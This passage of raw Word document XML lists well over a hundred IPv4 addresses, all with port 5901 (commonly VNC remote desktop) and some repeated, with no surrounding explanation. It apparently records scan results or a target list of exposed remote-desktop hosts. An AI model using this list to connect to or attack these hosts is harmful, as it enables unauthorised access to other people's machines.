      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">210.245.20.96:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.21.213.34:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.103.3.28:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.144.102.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.144.219.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.132.143:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.142.232:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.166.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.8:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.9:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">211.156.177.94:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.156.177.125:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.167.84.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">211.154.151.248:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">213.81.139.12:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.2.129.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.6.187.68:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.6.187.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.6.187.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.6.187.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.6.197.76:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.237.164.99:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.237.164.100:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">213.81.186.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.6.128.83:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.2.129.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">217.237.164.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.16.202.100:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.17.151.114:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.17.55.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.22.3.203:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.24.71.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">218.25.2.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.26.109.69:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.41:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.153.37:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.226.70:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.28.242.107:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.30.67.148:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.30.67.147:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.56.145.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.62.89.135:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.64.53.85:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.70.87.157:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.75.40.211:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.76.64.105:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.115.51:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.119.67:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.119.187:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.121.220:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.122.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.140:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.93.127.242:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">218.94.91.171:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.94.114.187:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.95.4.61:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.94.153.181:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.201.201.62:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.74.58:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.249.97:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.204.149.110:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.10:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.7:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.23:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.44:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.16:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.33:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.4:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">218.241.8.21:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.134.187.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.136.240.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.140.69.146:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">219.141.213.79:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.141.213.78:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.141.254.185:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.143.16.151:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.144.181.26:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.144.181.28:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.149.150.11:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.151.8.160:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">219.153.65.102:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.203.143:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.203.145:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.235:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.245:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.230:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.226:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.228:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.247:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.248:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.241:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.225:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.244:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">220.112.205.246:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.227:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.234:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.232:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.236:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.112.205.242:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.163.123.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.163.123.22:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.169.201.2:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.182.3.163:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.200.113.24:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.202.103.113:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.231.142.92:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">220.200.113.27:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.7.13.53:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.138.35:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.138.29:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.176.193.102:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.224.208.198:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.224.61.156:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.226.111.6:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.226.111.5:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">221.226.111.14:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.226.143.226:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.229.164.18:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.231.148.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.232.129.234:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.231.148.84:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.231.148.86:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.232.147.101:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.244:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.247:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.237.156.90:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.238.22.245:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">221.239.27.62:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.73.17.215:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.74.129.214:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.82.248.98:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.85.179.56:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.85.179.46:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.37.93:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.37.85:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.92.146.243:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">222.92.237.66:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.132.155.42:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.161.211.166:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.169.230.52:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:t xml:space="preserve">222.185.195.3:5901 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
